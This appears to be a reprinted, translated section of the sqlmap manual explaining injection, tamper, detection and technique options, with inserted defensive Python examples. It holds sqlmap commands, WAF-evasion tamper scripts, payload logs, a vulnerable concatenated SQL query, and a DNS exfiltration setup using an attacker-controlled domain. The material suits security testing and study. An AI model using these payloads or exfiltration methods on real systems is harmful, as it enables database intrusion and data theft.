Safety Test ===sqlmap (one) reprint

Source: Internet
Author: User
Tags logical operators microsoft sql server mysql version postgresql readable sql injection uppercase letter

VI. Optimization

These parameters tune sqlmap's performance.

1. One-click optimization

Parameter: -o

Adding this parameter is equivalent to adding the following three optimization parameters at once:

    • --keep-alive
    • --null-connection
    • --threads=3 (unless a higher value is set)

The meaning of each of these parameters is explained below.

2. HTTP persistent connections

Parameter: --keep-alive

This parameter makes sqlmap use persistent (keep-alive) HTTP connections. It is incompatible with "--proxy".

3. HTTP NULL connection

Parameter: --null-connection

There are special kinds of HTTP request that return the size of a response without fetching its body. This obviously saves a lot of bandwidth in boolean-based blind injection, where only the difference between a TRUE page and a FALSE page matters. The technique requires server-side support. It is incompatible with "--text-only".

4. HTTP concurrency

Parameter: --threads

Use this parameter to set the maximum number of concurrent HTTP requests sqlmap may make. For performance reasons, and so as not to overload the target site, the maximum is capped at 10.

VII. Injection

These parameters specify which parameters to test, customize the attack payload, and select tamper scripts.

1. Injection points to test

Parameters: -p and --skip

By default sqlmap tests all GET and POST parameters; at level 2 or higher it also tests cookie parameters, and at level 3 or higher the User-Agent and Referer headers. You can also give a comma-separated list of parameters to test explicitly; parameters in that list are tested regardless of the level. That is what "-p" does.

For example, to test only the GET parameter "id" and the User-Agent header:

  -p "id,user-agent"

Use "--skip" to exclude a parameter from testing. For example, to run at level 5 but skip User-Agent and Referer:

  --level=5 --skip="user-agent,referer"

Sometimes you will meet pseudo-static pages. A dynamic page lists its parameters openly, for example:

  /user.php?id=1

The parameter is obviously "id" with the value 1. A pseudo-static page may instead look like this:

  /user/1/

The parameter is hidden inside the URL path. Normally sqlmap does not test such pseudo-static parameters, because it cannot tell which part of the path is the parameter. To test it, mark the spot with "*": this tells sqlmap which segment is the pseudo-static parameter, and that segment is then treated exactly like a GET parameter. For example:

  python sqlmap.py -u "http(s)://target.cc/user/1*/"

2. Specifying the database management system

Parameter: --dbms

DBMS stands for "database management system". By default sqlmap detects the DBMS used by the web site automatically. sqlmap supports these DBMS:

    • MySQL
    • Oracle
    • PostgreSQL
    • Microsoft SQL Server
    • Microsoft Access
    • Firebird
    • SQLite
    • Sybase
    • SAP MaxDB
    • DB2

If automatic detection fails, or you do not want sqlmap to fingerprint the database at all, you can specify the DBMS manually with "--dbms", e.g. "--dbms PostgreSQL".

For MySQL and Microsoft SQL Server a version can be given as well:

  --dbms MySQL <version>
  --dbms Microsoft SQL Server <version>

For MySQL the version looks like "5.0"; for Microsoft SQL Server it looks like "2005".

If "--fingerprint" is given together with "--dbms", sqlmap only fingerprints within the specified DBMS.

Use "--dbms" only when you are certain; otherwise it is better to let sqlmap detect the DBMS automatically.

3. Specifying the operating system that runs the DBMS

Parameter: --os

By default sqlmap detects the operating system running the DBMS automatically. The fully supported operating systems are currently:

    • Linux
    • Windows

If you are certain of it, you can specify the operating system with "--os". As with "--dbms", use this only when you are sure; otherwise let sqlmap detect it.

4. Forcing large numbers when generating invalid parameter values

Parameter: --invalid-bignum

Sometimes sqlmap needs to generate an invalid parameter value during testing. By default it negates the existing value (for example, id=13 becomes id=-13). With "--invalid-bignum", sqlmap uses a large number instead (for example, id=99999999).

5. Forcing logical operators when generating invalid parameter values

Parameter: --invalid-logical

As above, the default invalid value is the negated original (id=13 becomes id=-13). With "--invalid-logical", sqlmap uses a logical operator instead (for example, id=13 AND 18=19).

6. Forcing strings when generating invalid parameter values

Parameter: --invalid-string

As above, the default invalid value is the negated original (id=13 becomes id=-13). With "--invalid-string", sqlmap uses a random string instead (for example, id=AKEWMC).

7. Turning off payload casting

Parameter: --no-cast

When retrieving results, sqlmap casts every value to a string type and replaces NULL values with a whitespace character. This avoids errors such as concatenating NULL with a string, and simplifies data retrieval. However, there are reports that it causes retrieval problems on older MySQL versions, so "--no-cast" tells sqlmap not to do it.

8. Turning off string escaping

Parameter: --no-escape

Sometimes sqlmap uses string values enclosed in single quotes in its payloads, e.g. SELECT 'foobar'. By default such strings are encoded, so this example becomes SELECT CHAR(102)+CHAR(111)+CHAR(111)+CHAR(98)+CHAR(97)+CHAR(114). That makes the payload harder to read, but it means server-side escaping such as magic_quotes or mysql_real_escape_string cannot alter the string. In some cases the encoding has to be disabled, for example to keep the payload short; "--no-escape" turns it off.

9. Custom payload

Parameters: --prefix and --suffix

Sometimes the injection only succeeds if a user-specified suffix is appended to the payload. In another scenario the user already knows how the query is written and can state the payload's prefix and suffix directly, so that detection and injection complete straight away.

An example of vulnerable source code:

  $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

Instead of letting sqlmap detect the boundaries automatically, they can be stated manually, for example:

  python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"

The final SQL statement becomes:

  SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1

This statement is syntactically correct, and the payload executes.

In a simple test environment sqlmap detects the boundaries and completes the injection without any custom prefix or suffix, but real-world applications can be more complex, with nested JOIN queries for example, and then the boundaries need to be given to sqlmap.
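As an added illustration (not code from the article), the vulnerable query above rebuilt in Python on an in-memory SQLite database, next to the same query written with a bound parameter. It shows why the "')" prefix and "AND ('abc'='abc" suffix form a usable boundary: with string concatenation a TRUE condition and a FALSE condition return different rows, while the parameterized version returns the same (empty) result for both, so there is no oracle. The users table and its rows are constructed for the example, and the LIMIT clause of the original query is left out so that row counts can be compared.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three users in an in-memory table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn


def lookup_concat(conn, user_input: str) -> List[Tuple[int, str]]:
    """Mirror of the article's vulnerable query: the input is pasted into the
    SQL text inside ('...'), so it can close the quote and parenthesis and
    append its own conditions."""
    query = "SELECT * FROM users WHERE id=('" + user_input + "')"
    return conn.execute(query).fetchall()


def lookup_param(conn, user_input: str) -> List[Tuple[int, str]]:
    """Same query with a bound parameter: the input is a value, never SQL."""
    return conn.execute("SELECT * FROM users WHERE id=(?)", (user_input,)).fetchall()


def has_boolean_oracle(lookup, conn) -> bool:
    """True if a TRUE and a FALSE condition built with the article's prefix
    ') and suffix AND ('abc'='abc produce different results."""
    true_case = lookup(conn, "1') AND ('abc'='abc")
    false_case = lookup(conn, "1') AND ('abc'='abd")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", lookup_concat), ("parameterized", lookup_param)):
        print(name, "normal lookup:", fn(db, "1"),
              "| oracle present:", has_boolean_oracle(fn, db),
              "| rows for OR case:", len(fn(db, "1') OR ('1'='1")))
```

The concatenated version also returns every row for the OR case, the data-exposure consequence the risk-level section below warns about; the parameterized version returns nothing, because the whole input is compared as one literal value against the integer id column.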

10. Modifying the injected data

Parameter: --tamper

Apart from encoding strings with CHAR(), sqlmap does not obfuscate its payloads. This parameter obfuscates the payload in order to get past an IPS or WAF. It takes the name of a tamper script; if the script lives in the tamper/ directory of the sqlmap installation, the path and the .py suffix can be omitted and only the file name given. Multiple tamper scripts are separated by commas.

There are many tamper scripts in the tamper/ directory, and all of them exist to obfuscate the payload. You can also write your own, which counts as advanced sqlmap usage. A valid tamper script looks like this:

  # Required import
  from lib.core.enums import PRIORITY

  # Priority of this tamper script
  __priority__ = PRIORITY.NORMAL


  def tamper(payload, **kwargs):
      """Description of what this tamper script does goes here."""
      retVal = payload
      # Code that modifies the payload goes here
      # Return the modified payload
      return retVal

The following example targets MySQL and assumes that the greater-than sign, spaces, and a capitalized SELECT are blocked:

  python sqlmap.py -u "http://192.168.56.101:8080/ScorePrj/?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

Part of the example's output:

  [12:55:52] [DEBUG] cleaning up configuration parameters
  [12:55:52] [INFO] loading tamper script 'between'
  [12:55:52] [INFO] loading tamper script 'randomcase'
  [12:55:52] [INFO] loading tamper script 'space2comment'
  [...]
  [12:55:53] [INFO] testing for SQL injection on GET parameter 'id'
  [12:55:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [12:55:53] [PAYLOAD] 1
  [12:55:53] [PAYLOAD] 1)/**/and/**/8083=4737/**/and/**/(4754/**/between/**/4754/**/and/**/4754
  [12:55:53] [PAYLOAD] 1)/**/and/**/4962=4962/**/and/**/(2361/**/between/**/2361/**/and/**/2361
  [12:55:53] [PAYLOAD] 1/**/and/**/9754/**/between/**/1206/**/and/**/1206
  [12:55:53] [PAYLOAD] 1/**/and/**/4962/**/between/**/4962/**/and/**/4962
  [12:55:53] [PAYLOAD] 1/**/AND/**/2741/**/BETWEEN/**/9323/**/AND/**/9323--/**/IHSA
  [12:55:53] [PAYLOAD] 1/**/and/**/4962/**/between/**/4962/**/and/**/4962--/**/wvui
  [12:55:53] [PAYLOAD] 1')/**/anD/**/1694=6061/**/and/**/('zlwu'='ZLWU
  [12:55:53] [PAYLOAD] 1')/**/and/**/4962=4962/**/and/**/('dsfw'='DSFW
  [12:55:53] [PAYLOAD] 1'/**/and/**/6307=8901/**/and/**/'fkln'='fKLn
  [12:55:53] [PAYLOAD] 1'/**/and/**/4962=4962/**/and/**/'yfsp'='YFSP
  [12:55:53] [PAYLOAD] 1%'/**/and/**/3549=6854/**/and/**/'%'='
  [12:55:53] [PAYLOAD] 1%'/**/and/**/4962=4962/**/and/**/'%'='
  [...]
  [12:55:54] [PAYLOAD] 1)/**/UNION/**/ALL/**/SELECT/**/NULL--/**/NRTQ
  [12:55:54] [PAYLOAD] 1)/**/union/**/all/**/Select/**/null,null--/**/jalk
  [12:55:54] [PAYLOAD] 1)/**/union/**/all/**/select/**/null,null,null--/**/ylpg
  [...]

Without the tamper scripts, part of the output of the same command is:

  [...]
  [13:00:12] [INFO] testing for SQL injection on GET parameter 'id'
  [13:00:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [13:00:12] [PAYLOAD] 1) and 9902=5632 and (5820=5820
  [13:00:12] [PAYLOAD] 1) and 6711=6711 and (7174=7174
  [13:00:12] [PAYLOAD] 1 and 7140=6136
  [13:00:12] [PAYLOAD] 1 and 6711=6711
  [13:00:12] [PAYLOAD] 1 and 1693=7532--OQCR
  [13:00:12] [PAYLOAD] 1 and 6711=6711--QAPJ
  [13:00:12] [PAYLOAD] 1') and 6904=7395 and ('xblu'='Xblu
  [13:00:12] [PAYLOAD] 1') and 6711=6711 and ('Rgox'='Rgox
  [13:00:12] [PAYLOAD] 1' and 6469=7302 and 'macj'='MACJ
  [13:00:12] [PAYLOAD] 1' and 6711=6711 and 'psyg'='psyg
  [13:00:12] [PAYLOAD] 1%' and 7516=3605 and '%'='
  [13:00:12] [PAYLOAD] 1%' and 6711=6711 and '%'='
  [...]
  [13:00:12] [PAYLOAD] 1) UNION ALL select null--Mudh
  [13:00:12] [PAYLOAD] 1) UNION ALL select null,null--Qkid
  [13:00:12] [PAYLOAD] 1) UNION all SELECT null,null,null--iwvt
  [...]
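
A defender's counterpart to the two outputs above, added here and not part of the article: a small Python detector that undoes the two obfuscations visible in the tampered payloads (inline comments from space2comment, mixed keyword case from randomcase) before matching the boolean-blind and UNION probe shapes, so that the tampered and untampered forms of one payload are classified the same way. The request lines are constructed from payloads shown above; the function and pattern names are the example's own.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed request lines, modelled on the payloads in the outputs above.
SAMPLE_REQUESTS = [
    "GET /ScorePrj/?id=1 HTTP/1.1",
    "GET /ScorePrj/?id=1)/**/and/**/8083=4737/**/and/**/(4754/**/between/**/4754/**/and/**/4754 HTTP/1.1",
    "GET /ScorePrj/?id=1/**/AND/**/2741/**/BETWEEN/**/9323/**/AND/**/9323--/**/IHSA HTTP/1.1",
    "GET /ScorePrj/?id=1%27)/**/anD/**/1694=6061/**/and/**/(%27zlwu%27=%27ZLWU HTTP/1.1",
    "GET /ScorePrj/?id=1)/**/union/**/all/**/Select/**/null,null--/**/jalk HTTP/1.1",
    "GET /ScorePrj/?id=1)%20and%206711=6711%20and%20(7174=7174 HTTP/1.1",
]

# Shapes of the probes seen above, matched against the normalized value.
BOOLEAN_PROBE = re.compile(r"\band\s+\(?\s*\d+\s*(?:=\s*\d+|between\s+\d+\s+and\s+\d+)")
UNION_PROBE = re.compile(r"\bunion\s+(?:all\s+)?select\b")


def normalize(value: str) -> str:
    """Undo space2comment and randomcase: replace inline comments with a
    space, collapse whitespace, lowercase everything."""
    without_comments = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", without_comments).strip().lower()


def classify(value: str) -> Optional[str]:
    """Label a parameter value by the probe shape it matches, if any."""
    n = normalize(value)
    if UNION_PROBE.search(n):
        return "union-probe"
    if BOOLEAN_PROBE.search(n):
        return "boolean-probe"
    return None


def scan(request_line: str) -> List[Tuple[str, str]]:
    """Return (parameter, label) for each suspicious query parameter in one
    request line; parse_qsl also URL-decodes the values."""
    _method, target, _version = request_line.split(" ", 2)
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        label = classify(value)
        if label:
            hits.append((name, label))
    return hits


def scan_all(lines) -> List[Tuple[int, List[Tuple[str, str]]]]:
    """Index and findings for every line that contains at least one probe."""
    results = []
    for i, line in enumerate(lines):
        hits = scan(line)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan_all(SAMPLE_REQUESTS):
        print(index, hits, "<-", SAMPLE_REQUESTS[index])
```

Normalizing before matching is the point: a rule that only knows the plain form "and 6711=6711" misses the comment-laden variant, while a rule applied after comment stripping and case folding treats both the same. The sample set also shows the limit of this approach: it recognises these two probe shapes only, so other sqlmap techniques (error-based, time-based, stacked) need their own patterns.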

VIII. Detection

1. Detection level

Parameter: --level

This parameter sets the detection level, from 1 to 5. The default is 1, the least testing; level 5 does the most. The payloads sqlmap uses are stored as XML in the directory xml/payloads/ and can be customized. An excerpt of one payload is shown below:

  <test>      <title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>      <stype>1</stype>      <level>2</level>      <risk>1</risk>      <clause>1</clause>      <where>1</where>      <vector>AND [INFERENCE]</vector>      <request>          <payload>AND [RANDNUM]=[RANDNUM]</payload>          <comment>[GENERIC_SQL_COMMENT]</comment>      </request>      <response>          <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>      </response>  </test>

In the excerpt above the level tag has the value 2: this payload is used only when the detection level is 2 or higher. The risk tag is explained in the next section.

The detection level affects not only which payloads are used but also which injection points are tested: GET and POST parameters are always tested; at level 2 or higher cookies are tested for injection as well; at level 3 or higher the User-Agent and Referer headers are tested too.

If it is unclear where the injection point is, set a higher detection level.

It is strongly recommended to raise the detection level before reporting to the sqlmap project that a known injection vulnerability went undetected.

2. Risk level

Parameter: --risk

This parameter sets the risk level, from 1 to 4. The default is 1, which is harmless to the target in most cases. Risk level 2 adds time-based injection tests, and level 3 adds OR-based tests.

If the injection point is inside an UPDATE statement, an OR-based test may modify every row of the table, which is clearly not what the person testing wants. Users therefore need control over the risk level so that potentially destructive payloads can be avoided.
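To make the gating in the two sections above concrete, an added example (not sqlmap's own code): a simplified model of how the level and risk values of each payload entry decide whether it runs for a given --level and --risk. The catalogue of five entries is constructed in memory with ElementTree and modelled on the excerpt above; load_payload_file() shows how a real file from xml/payloads/ would be read instead. Titles, numbers and function names are the example's own.

```python
import xml.etree.ElementTree as ET
from typing import List


def build_sample_catalogue() -> ET.Element:
    """Constructed in-memory catalogue using the same element names as the
    excerpt above (title, level, risk); titles and numbers are sample values."""
    samples = [
        ("AND boolean-based blind - WHERE or HAVING clause", 1, 1),
        ("AND boolean-based blind - WHERE or HAVING clause (Generic comment)", 2, 1),
        ("OR boolean-based blind - WHERE or HAVING clause", 1, 3),
        ("AND time-based blind (heavy query)", 2, 2),
        ("Generic UNION query (NULL) - 1 to 10 columns", 1, 1),
    ]
    root = ET.Element("root")
    for title, level, risk in samples:
        entry = ET.SubElement(root, "test")
        ET.SubElement(entry, "title").text = title
        ET.SubElement(entry, "level").text = str(level)
        ET.SubElement(entry, "risk").text = str(risk)
    return root


def load_payload_file(path: str) -> ET.Element:
    """Read a real payload file (assumed to use the same element names)."""
    return ET.parse(path).getroot()


def selected_tests(root: ET.Element, level: int = 1, risk: int = 1) -> List[str]:
    """Titles of entries that run at the given --level and --risk: an entry is
    skipped when its own level or its own risk exceeds the chosen setting."""
    chosen = []
    for entry in root.findall("test"):
        entry_level = int(entry.findtext("level", "1"))
        entry_risk = int(entry.findtext("risk", "1"))
        if entry_level > level or entry_risk > risk:
            continue
        chosen.append(entry.findtext("title", ""))
    return chosen


def skipped_tests(root: ET.Element, level: int = 1, risk: int = 1) -> List[str]:
    """Titles that the same settings leave out, in catalogue order."""
    kept = set(selected_tests(root, level, risk))
    return [e.findtext("title", "") for e in root.findall("test")
            if e.findtext("title", "") not in kept]


if __name__ == "__main__":
    catalogue = build_sample_catalogue()
    for lvl, rsk in ((1, 1), (2, 1), (5, 2), (5, 3)):
        print(f"--level={lvl} --risk={rsk}:", selected_tests(catalogue, lvl, rsk))
```

With the defaults only the two level-1, risk-1 entries run; the OR-based entry needs --risk 3 regardless of the level, which is the control the risk section relies on to keep OR payloads away from UPDATE statements.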

3. Page comparison

Parameters: --string, --not-string, --regexp

By default, in boolean-based blind injection sqlmap decides between TRUE and FALSE by comparing the content of the returned pages. Sometimes, however, the page changes on every refresh, for example because of dynamic advertisements. sqlmap tries to identify the dynamic parts of the page, but does not always succeed. With "--string" the user can name a string that TRUE pages contain and FALSE pages do not, and sqlmap then decides by whether that string is present. If such strings vary, "--regexp" gives a regular expression to match them instead. Conversely, "--not-string" names a string that FALSE pages contain and TRUE pages do not.

Parameter: --code

More simply, if the user knows that TRUE pages come back with HTTP status 200 and FALSE pages with another status, say 401, this can be told to sqlmap with "--code", e.g. "--code=200".

Parameter: --titles

If the user knows the titles of TRUE and FALSE pages, e.g. TRUE pages are titled "Welcome" and FALSE pages "Forbidden", "--titles" makes sqlmap decide by the page title.

Parameter: --text-only

If the HTTP response body contains a lot of active content such as JavaScript, "--text-only" makes sqlmap compare only the plain text of the pages.
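The comparison criteria above, modelled in Python as an added example (not sqlmap's code). Two constructed pages differ only in a result line and in a random advertisement id inside a script tag; the example shows that plain body comparison is defeated by the dynamic part, that "--text-only"-style stripping, "--string", "--not-string" and "--regexp" recover a decision, and that "--titles" and "--code" cannot help when both pages share the same title and status. Function names and the sample pages are the example's own.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Response:
    status: int
    body: str


def page_title(body: str) -> Optional[str]:
    """Title of an HTML body, or None if it has none."""
    m = re.search(r"<title>(.*?)</title>", body, re.I | re.S)
    return m.group(1).strip() if m else None


def text_only(body: str) -> str:
    """Crude plain-text reduction: drop script blocks, then all tags."""
    body = re.sub(r"<script\b.*?</script>", "", body, flags=re.I | re.S)
    return re.sub(r"<[^>]+>", "", body)


def looks_true(resp: Response, reference: Response, string=None, not_string=None,
               regexp=None, code=None, titles=False, text=False) -> bool:
    """Decide whether resp is a TRUE page. The first explicit criterion given
    (in this order) is used; with none, the body, or its plain text, is
    compared with the reference TRUE page."""
    if code is not None:
        return resp.status == code
    if string is not None:
        return string in resp.body
    if not_string is not None:
        return not_string not in resp.body
    if regexp is not None:
        return re.search(regexp, resp.body) is not None
    if titles:
        return page_title(resp.body) == page_title(reference.body)
    if text:
        return text_only(resp.body) == text_only(reference.body)
    return resp.body == reference.body


def _page(result: str, ad_id: str) -> Response:
    """Constructed sample page: same title and status, a random advert id."""
    return Response(200, "<html><head><title>Welcome</title></head><body>"
                         f"<script>showAd('{ad_id}')</script><p>{result}</p></body></html>")


REFERENCE_TRUE = _page("Hello, alice", "1208")
TRUE_PAGE = _page("Hello, alice", "7731")    # same content, different advert
FALSE_PAGE = _page("No such user", "4410")


if __name__ == "__main__":
    for label, kwargs in (("plain", {}), ("text", {"text": True}),
                          ("string", {"string": "Hello, alice"}),
                          ("titles", {"titles": True}), ("code", {"code": 200})):
        print(label, looks_true(TRUE_PAGE, REFERENCE_TRUE, **kwargs),
              looks_true(FALSE_PAGE, REFERENCE_TRUE, **kwargs))
```

For an application owner the model reads the other way round: any stable difference between the two responses, be it status, title, a fixed string or the remaining plain text, is an oracle, and the dynamic advert only hides it from the least precise comparison.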

IX. Injection techniques

These parameters adjust specific SQL injection techniques.

1. Techniques used in testing

Parameter: --technique

This parameter specifies which techniques are used to detect injection. By default sqlmap uses every technique it supports. The value is a string of uppercase letters drawn from B, E, U, S, T and Q, with these meanings:

    • B: boolean-based blind
    • E: error-based
    • U: UNION query-based
    • S: stacked queries (multiple-statement injection)
    • T: time-based blind
    • Q: inline queries (nested query injection)

For example, "--technique ES" selects two techniques, and "--technique BEUSTQ" is equivalent to the default.

To access the file system or the Windows registry, be sure to include "S", the stacked-queries test.

2. Delay for time-based blind injection

Parameter: --time-sec

Use this parameter to set the delay used in time-based blind injection; the default is 5 seconds.

3. Number of columns in UNION query injection

Parameter: --union-cols

For UNION query injection sqlmap detects the number of columns automatically, trying 1 to 10. At higher levels the upper limit of the range rises to 50.

Use this parameter to set the range yourself, e.g. "--union-cols 12-16" makes sqlmap try 12 to 16 columns.

4. Characters used in UNION query injection

Parameter: --union-char

By default sqlmap uses NULL for UNION query injection. At higher levels it uses random numbers instead, because injection with NULL sometimes fails where random numbers succeed.

Use this parameter to specify the value used in UNION query injection, e.g. "--union-char 123".

What does "the character used in UNION query injection" mean? Look at the following two examples.

In the first example, without "--union-char", the default NULL is used:

  python sqlmap.py -u "http://192.168.56.101/user.php?id=001" --technique U -v 3

Part of the output:

  [10:59:15] [PAYLOAD] 001 UNION ALL SELECT NULL,CONCAT(0x71707a6271,0x66546c7770497458576f6455476761654654745744684c5062585971794c556d55454a6c49525675,0x7162767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- FAcV
  [10:59:15] [PAYLOAD] 001 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a6271,0x6b43674e76687959526b6452627255787373675a6f5a436f7266756d49424547496d506779456170,0x7162767671),NULL,NULL,NULL,NULL,NULL-- caXD

In the second example, "--union-char 123" sets the value used in the UNION query to "123":

  python sqlmap.py -u "http://192.168.56.101/user.php?id=001" --technique U -v 3 --union-char 123

Part of the output:

  [10:59:30] [PAYLOAD] 001 UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123,123,CONCAT(0x716b707171,0x776c71686e54726659424b49616d68756e64734d45774c4c7163494345794255784557597a484244,0x7178627071)-- aUXO
  [10:59:30] [PAYLOAD] 001 UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123,CONCAT(0x716b707171,0x6f5278444767675156496c724563714e6568634c6b5950646a6f4e53516b776d77474e7141425273,0x7178627071),123-- lPHb

Comparing the two outputs shows that "the character used in UNION query injection" is the xxx in "UNION ALL SELECT xxx,xxx,...".

5. Table name in UNION query injection

Parameter: --union-from

With some DBMS, such as Microsoft Access, a valid and accessible table name must be given in the UNION query or it fails, because such a DBMS does not accept a statement like "SELECT 1, 2;" without a FROM clause. Use this parameter to specify the table, e.g. "--union-from=users".

6. DNS exfiltration attack

Parameter: --dns-domain

The details of DNS exfiltration in SQL injection are in the paper "Data Retrieval over DNS in SQL Injection Attacks".

Suppose an attacker controls the name server for a domain (for example attacker.com), so that lookups of subdomains of that domain are answered by that server. The attacker can then use "--dns-domain attacker.com" to perform a DNS exfiltration attack.

If the attacker does not control any name server, she can register a new domain and set up a name server for it to receive the data.

7. Second-order injection

Parameter: --second-order

Sometimes the result of the injection is displayed on a different page. This parameter, followed by a URL, tells sqlmap which page shows the result.

X. Fingerprinting

By default sqlmap identifies the DBMS of the injected target by fingerprinting.

Parameters: -f or --fingerprint

Add this parameter for a more extensive DBMS fingerprint.

Parameters: -b or --banner

Add this parameter for more accurate fingerprint results; it is described later in this article.

XI. Brute force

1. Brute-forcing table names

Parameter: --common-tables

In some cases "--tables" cannot list the table names in the database, for example:

    • MySQL versions before 5.0 have no information_schema
    • Microsoft Access's MSysObjects table is not readable by default
    • The database user's privileges are too low to read table names

When table names cannot be read, "--common-tables" brute-forces them using the dictionary txt/common-tables.txt, which lists common table names and can be edited by hand.

2. Brute-forcing column names

Parameter: --common-columns

In some cases "--columns" cannot list the column names of a table, for example:

    • MySQL versions before 5.0 have no information_schema
    • Microsoft Access's MSysObjects table is not readable by default
    • The database user's privileges are too low to read column names

When column names cannot be read, "--common-columns" brute-forces them using the dictionary txt/common-columns.txt, which lists common column names and can be edited by hand.
